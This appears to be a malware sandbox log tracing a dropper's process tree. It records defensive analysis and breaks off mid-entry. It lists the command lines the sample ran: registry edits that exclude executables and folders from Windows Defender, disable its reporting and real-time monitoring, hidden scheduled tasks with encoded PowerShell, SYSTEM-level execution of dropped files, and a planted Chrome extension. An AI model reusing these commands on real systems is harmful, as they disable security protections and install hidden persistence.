PID 2708 wrote to memory of 2644 | 2708 | cmd.exe | reg.exe
PID 2708 wrote to memory of 2644 | 2708 | cmd.exe | reg.exe
PID 2708 wrote to memory of 2644 | 2708 | cmd.exe | reg.exe
PID 2708 wrote to memory of 2644 | 2708 | cmd.exe | reg.exe
PID 2708 wrote to memory of 2644 | 2708 | cmd.exe | reg.exe
PID 2708 wrote to memory of 2644 | 2708 | cmd.exe | reg.exe
PID 2492 wrote to memory of 2784 | 2492 | cmd.exe | reg.exe
PID 2492 wrote to memory of 2784 | 2492 | cmd.exe | reg.exe
PID 2492 wrote to memory of 2784 | 2492 | cmd.exe | reg.exe
PID 2492 wrote to memory of 2784 | 2492 | cmd.exe | reg.exe
PID 2492 wrote to memory of 2784 | 2492 | cmd.exe | reg.exe
PID 2492 wrote to memory of 2784 | 2492 | cmd.exe | reg.exe
PID 2492 wrote to memory of 2784 | 2492 | cmd.exe | reg.exe
PID 2708 wrote to memory of 2908 | 2708 | cmd.exe | reg.exe
PID 2708 wrote to memory of 2908 | 2708 | cmd.exe | reg.exe
PID 2708 wrote to memory of 2908 | 2708 | cmd.exe | reg.exe
PID 2708 wrote to memory of 2908 | 2708 | cmd.exe | reg.exe
PID 2708 wrote to memory of 2908 | 2708 | cmd.exe | reg.exe
PID 2708 wrote to memory of 2908 | 2708 | cmd.exe | reg.exe
PID 2708 wrote to memory of 2908 | 2708 | cmd.exe | reg.exe
PID 2492 wrote to memory of 2176 | 2492 | cmd.exe | reg.exe
Processes
(process tree; indentation shows depth, each entry gives image path, command line, matched signatures and PID)

C:\Users\Admin\AppData\Local\Temp\file.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\file.exe"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID: 2412

  C:\Users\Admin\AppData\Local\Temp\7zS930C.tmp\Install.exe
    command line: .\Install.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID: 2804

    C:\Users\Admin\AppData\Local\Temp\7zS9878.tmp\Install.exe
      command line: .\Install.exe /GnXjwdidG "525403" /S
      - Checks BIOS information in registry
      - Executes dropped EXE
      - Loads dropped DLL
      - Drops file in System32 directory
      - Enumerates system info in registry
      - Suspicious use of WriteProcessMemory
      PID: 2684

      C:\Windows\SysWOW64\forfiles.exe
        command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&reg ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        - Suspicious use of WriteProcessMemory
        PID: 2700

        C:\Windows\SysWOW64\cmd.exe
          command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
          - Suspicious use of WriteProcessMemory
          PID: 2708

          \??\c:\windows\SysWOW64\reg.exe
            command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
            PID: 2644

          \??\c:\windows\SysWOW64\reg.exe
            command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
            PID: 2908

      C:\Windows\SysWOW64\forfiles.exe
        command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&reg ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        - Suspicious use of WriteProcessMemory
        PID: 2580

        C:\Windows\SysWOW64\cmd.exe
          command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
          - Suspicious use of WriteProcessMemory
          PID: 2492

          \??\c:\windows\SysWOW64\reg.exe
            command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
            PID: 2784

          \??\c:\windows\SysWOW64\reg.exe
            command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
            PID: 2176
      C:\Windows\SysWOW64\schtasks.exe
        command line: schtasks /CREATE /TN "grhLnNDuO" /SC once /ST 07:36:18 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        (the -EncodedCommand value is base64 of UTF-16LE text and decodes to: start-process -WindowStyle Hidden gpupdate.exe /force; the same encoded command is reused by the later powershell.EXE and schtasks entries)
        - Creates scheduled task(s)
        PID: 2480
      C:\Windows\SysWOW64\schtasks.exe
        command line: schtasks /run /I /tn "grhLnNDuO"
        PID: 2540

      C:\Windows\SysWOW64\schtasks.exe
        command line: schtasks /DELETE /F /TN "grhLnNDuO"
        PID: 1792

      C:\Windows\SysWOW64\schtasks.exe
        command line: schtasks /CREATE /TN "bQrKcOXclPyMmQgfTY" /SC once /ST 17:29:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\xtiGjqqlqnODuBu\ycRIbyo.exe\" BX /Nrsite_idNdO 525403 /S" /V1 /F
        - Drops file in Windows directory
        - Creates scheduled task(s)
        PID: 2364

C:\Windows\system32\taskeng.exe
  command line: taskeng.exe {38191FB5-5A1C-487B-9215-48BBFFF4006E} S-1-5-21-2085049433-1067986815-1244098655-1000:AHLBRYJO\Admin:Interactive:[1]
  PID: 2892

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 2904

    C:\Windows\system32\gpupdate.exe
      command line: "C:\Windows\system32\gpupdate.exe" /force
      PID: 2532

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 1256

    C:\Windows\system32\gpupdate.exe
      command line: "C:\Windows\system32\gpupdate.exe" /force
      PID: 1268

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 2868

    C:\Windows\system32\gpupdate.exe
      command line: "C:\Windows\system32\gpupdate.exe" /force
      PID: 2416

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 1232

    C:\Windows\system32\gpupdate.exe
      command line: "C:\Windows\system32\gpupdate.exe" /force
      PID: 2976

C:\Windows\system32\gpscript.exe
  command line: gpscript.exe /RefreshSystemParam
  PID: 2796

C:\Windows\system32\taskeng.exe
  command line: taskeng.exe {D840B3E7-CA5D-4B92-B102-E191A9B4E4A0} S-1-5-18:NT AUTHORITY\System:Service:
  PID: 2280

  C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\xtiGjqqlqnODuBu\ycRIbyo.exe
    command line: C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\xtiGjqqlqnODuBu\ycRIbyo.exe BX /Nrsite_idNdO 525403 /S
    - Executes dropped EXE
    - Drops file in System32 directory
    PID: 1080

    C:\Windows\SysWOW64\schtasks.exe
      command line: schtasks /CREATE /TN "ghmPelLfX" /SC once /ST 10:53:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
- Creates scheduled task(s)
PID:656 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ghmPelLfX"3⤵PID:3056
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ghmPelLfX"3⤵PID:2836
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:892
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1228 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1648
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1964 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gDnVtRpAs" /SC once /ST 12:45:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1452 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gDnVtRpAs"3⤵PID:1840
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gDnVtRpAs"3⤵PID:2776
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:323⤵PID:2472
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2704 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:643⤵PID:2548
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2624 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:323⤵PID:2500
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:324⤵PID:2060
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:643⤵PID:2520
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:644⤵PID:2980
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\szdKxxrFMiVXCdXj\XGZzlsuq\rkxIAufwvYuOQYHt.wsf"3⤵PID:3032
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\szdKxxrFMiVXCdXj\XGZzlsuq\rkxIAufwvYuOQYHt.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2476 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2584 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1112 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bJazgiTXFJUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2728 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\icEyDogKU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1448 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bJazgiTXFJUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:340 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\icEyDogKU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1068 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycMZCyUlVfbU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2132 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycMZCyUlVfbU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2216 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yczsUHdtPuMxC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2788 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yczsUHdtPuMxC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2036 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\sUklQelueKqzsVVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1136 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\sUklQelueKqzsVVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1860 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1116 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1812 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1756 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1556 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2824 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2948 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR" /t REG_DWORD /d 0 /reg:324⤵PID:2112
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR" /t REG_DWORD /d 0 /reg:644⤵PID:436
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bJazgiTXFJUn" /t REG_DWORD /d 0 /reg:324⤵PID:1976
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bJazgiTXFJUn" /t REG_DWORD /d 0 /reg:644⤵PID:964
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\icEyDogKU" /t REG_DWORD /d 0 /reg:324⤵PID:624
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\icEyDogKU" /t REG_DWORD /d 0 /reg:644⤵PID:1868
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycMZCyUlVfbU2" /t REG_DWORD /d 0 /reg:324⤵PID:2944
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycMZCyUlVfbU2" /t REG_DWORD /d 0 /reg:644⤵PID:948
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yczsUHdtPuMxC" /t REG_DWORD /d 0 /reg:324⤵PID:1612
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yczsUHdtPuMxC" /t REG_DWORD /d 0 /reg:644⤵PID:1892
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\sUklQelueKqzsVVB" /t REG_DWORD /d 0 /reg:324⤵PID:944
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\sUklQelueKqzsVVB" /t REG_DWORD /d 0 /reg:644⤵PID:2836
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:600
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:2072
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF" /t REG_DWORD /d 0 /reg:324⤵PID:2920
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF" /t REG_DWORD /d 0 /reg:644⤵PID:1840
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:324⤵PID:1764
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:644⤵PID:2924
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gYFegiANi" /SC once /ST 07:43:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2380 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gYFegiANi"3⤵PID:2868
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gYFegiANi"3⤵PID:2060
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1380
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:2520
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1972
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:2644
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NDmpcgCvNfyvVRxht" /SC once /ST 11:09:01 /RU "SYSTEM" /TR "\"C:\Windows\Temp\szdKxxrFMiVXCdXj\ftQFJCRfveHPGNc\DSWBkkp.exe\" qh /JHsite_idpVY 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:888 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "NDmpcgCvNfyvVRxht"3⤵PID:2540
-
C:\Windows\Temp\szdKxxrFMiVXCdXj\ftQFJCRfveHPGNc\DSWBkkp.exeC:\Windows\Temp\szdKxxrFMiVXCdXj\ftQFJCRfveHPGNc\DSWBkkp.exe qh /JHsite_idpVY 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1712 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bQrKcOXclPyMmQgfTY"3⤵PID:2564
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1456
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:2032
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1128
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:2532
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\icEyDogKU\YfJxcM.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "NplADKkCBziqQHN" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2552 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NplADKkCBziqQHN2" /F /xml "C:\Program Files (x86)\icEyDogKU\UsAnVhq.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1504 -
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "NplADKkCBziqQHN"3⤵PID:1420
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "NplADKkCBziqQHN"3⤵PID:2828
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GHwlerDeIQsNdm" /F /xml "C:\Program Files (x86)\ycMZCyUlVfbU2\cPywBfa.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1640 -
